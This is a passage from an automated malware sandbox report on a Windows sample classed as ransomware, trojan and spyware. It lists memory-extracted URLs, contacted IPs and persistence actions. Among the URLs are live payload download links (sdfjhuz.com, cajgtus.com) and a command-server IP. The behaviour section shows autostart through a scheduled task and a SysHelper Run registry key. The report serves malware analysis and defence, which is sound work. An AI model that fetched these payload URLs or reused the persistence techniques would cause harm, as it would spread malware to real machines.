https://s.ytimg.com;	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.google.com/accounts/OAuthLogin?issueuberauth=1	craw_window.js.5.dr	false		high
http://www.reddit.com/	sIQywRNC5M.exe, 00000007.00000003.2118302997.0000000003210000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cajgtus.com/test2/get.phpu	sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000072C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover.uk/autodiscover/autodiscover.xml	excel.exe_Rules.xml.5.dr	false		unknown
https://steam.tv/	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://autodiscover.xyz/Autodiscover/Autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonZ	sIQywRNC5M.exe, 00000016.00000002.2555939847.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://autodiscover.com.br/autodiscover/autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe	unknown
https://95.217.9.1490.5938.132	build2.exe, 00000009.00000002.2286401544.0000000000558000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://store.steampowered.com/privacy_agreement/	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://payments.google.com/payments/v4/js/integrator.js	craw_window.js.5.dr	false		high
http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D	sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sdfjhuz.com/dl/build2.exe$run	sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.json8#	sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonj	sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199673019888/badges	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/x2.gif	craw_window.js.5.dr	false		high
https://api.2ip.ua/S	sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000072C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://clients3.google.com/generate_204	sIQywRNC5M.exe, 00000005.00000003.2126068659.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.9.149/l%	build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover.in/autodiscover/autodiscover.xml	excel.exe_Rules.xml.5.dr	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/dot2.gif	craw_window.js.5.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.9.149ta	build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000514000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.2ip.ua/A	sIQywRNC5M.exe, 00000016.00000003.2554428371.0000000000714000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2556136161.0000000000716000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json:	sIQywRNC5M.exe, 00000016.00000002.2555939847.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.youtube.com/	sIQywRNC5M.exe, 00000005.00000003.2118438194.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonYS;	sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27	sIQywRNC5M.exe, 00000005.00000003.2543993505.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2542735764.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2546212237.0000000000858000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2545134934.0000000000846000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2543898374.0000000000845000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2543837357.0000000000858000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000078E000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493673195.0000000000771000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://autodiscover.online/autodiscover/autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://autodiscover.com.cn/Autodiscover/Autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe	unknown
https://autodiscover.it/autodiscover/autodiscover.xml	excel.exe_Rules.xml.5.dr	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/7	sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000657000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000003.2041498848.000000000066A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.9.149/so	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/about/	build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonqS	sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/irfailAt	build2.exe, 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://95.217.9.149.exe	build2.exe, 00000009.00000002.2286401544.000000000051A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover.com.br/Autodiscover/Autodiscover.xml	excel.exe_Rules.xml.5.dr	false		unknown
https://github.com/react-native-community/react-native-netinfo	sIQywRNC5M.exe, 00000005.00000003.2126068659.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.m	sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://95.217.9.149	build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/cleardot.gif	craw_window.js.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
201.103.73.225	sdfjhuz.com	Mexico	8151	UninetSAdeCVMX	true
63.143.98.185	cajgtus.com	Jamaica	33576	DIG001JM	true
184.85.65.125	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
95.217.9.149	unknown	Germany	24940	HETZNER-ASDE	false
104.21.65.24	api.2ip.ua	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431081
Start date and time:	2024-04-24 14:46:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sIQywRNC5M.exe renamed because original name is a hash value
Original Sample Name:	03cea6f6022a3a08d1ea003091a3e502.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.evad.winEXE@45/1414@8/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 65 Number of non-executed functions: 226
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:47:02	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe s>--Task
14:47:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
14:47:06	API Interceptor	1x Sleep call for process: sIQywRNC5M.exe modified
14:47:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
14:47:17	API Interceptor	1x Sleep call for process: build2.exe modified
14:47:19	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
14:48:02	API Interceptor	7130934x Sleep call for process: mstsca.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
63.143.98.185	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	sdfjhuz.com/dl/build2.exe
	MT5Um6Ykrl.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	sajdfue.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	sdfjhuz.com/dl/build2.exe
184.85.65.125	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	SecuriteInfo.com.Trojan.DownLoader46.54442.571.13133.exe	Get hash	malicious	Vidar	Browse
	OKaDvPJcTF.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer	Browse
	Jrkfds7rI5.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer	Browse
	dmDeFvntUL.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	8lypeeOlrN.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer	Browse
95.217.9.149	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
104.21.65.24	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	2llKbb9pR7.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cajgtus.com	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	189.232.19.193
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.163.142.13
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.232.19.193
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	200.45.93.45
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	85.11.159.22
	UXNob1Dp32.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	189.245.19.217
